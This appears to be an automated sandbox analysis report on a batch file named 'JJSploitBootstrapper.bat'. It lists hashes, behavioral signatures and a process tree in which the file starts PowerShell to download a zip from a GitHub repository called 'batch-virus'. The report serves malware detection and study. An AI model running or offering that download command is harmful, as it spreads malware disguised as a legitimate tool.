Analysis
-
max time kernel
117s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240704-en -
resource tags
arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system -
submitted
20/09/2024, 02:59
Static task
static1
Behavioral task
behavioral1
Sample
JJSploitBootstrapper.bat
Resource
win7-20240704-en
4 signatures
150 seconds
Behavioral task
behavioral2
Sample
JJSploitBootstrapper.bat
Resource
win10v2004-20240802-en
16 signatures
150 seconds
General
-
Target
JJSploitBootstrapper.bat
-
Size
992B
-
MD5
bca8f39baed66bcfcc6aaf4804a7770f
-
SHA1
198fde86f372a658952ea1a9b18601d8672585d6
-
SHA256
a62f52af73df95dfb8482f0658fd396ccce80460a17bbeeabad15afd4757a9c6
-
SHA512
4330793748cfc3ca02dc7258d4c60dd8ab58623ffe90e2704a33544d4625b9a70e9c7ab0f611f29534b69af2bcf7068e9f982615ca997037f0ed5cde0103e972
Score
8/10
Malware Config
Signatures
-
pid Process 2564 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2564 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2564 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2372 wrote to memory of 2564 2372 cmd.exe 31 PID 2372 wrote to memory of 2564 2372 cmd.exe 31 PID 2372 wrote to memory of 2564 2372 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\JJSploitBootstrapper.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2372 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command "Invoke-WebRequest -Uri 'https://github.com/SparkScratch-P/batch-virus/archive/refs/heads/main.zip' -OutFile 'repository.zip'"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2564
-